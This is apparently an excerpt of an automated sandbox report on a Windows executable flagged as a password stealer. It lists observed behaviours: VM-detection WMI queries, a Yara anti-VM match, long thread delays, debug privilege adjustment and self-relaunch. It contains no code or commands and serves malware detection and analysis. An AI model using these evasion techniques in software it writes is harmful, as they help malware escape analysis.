                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe PID: 4856, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 7910000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 8910000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 7910000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWindow / User API: threadDelayed 1000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWindow / User API: threadDelayed 5260Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 5164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7320Thread sleep count: 1000 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7320Thread sleep count: 5260 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -99000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98560s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -98015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97577s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -97031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -96922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -96812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -96703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe TID: 7312Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98891Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98671Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98560Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98453Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98343Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98234Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98125Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 98015Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97906Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97796Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97687Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97577Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97468Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97359Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97250Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97140Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 97031Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 96922Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 96812Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 96703Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe, 00000002.00000002.2876160661.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
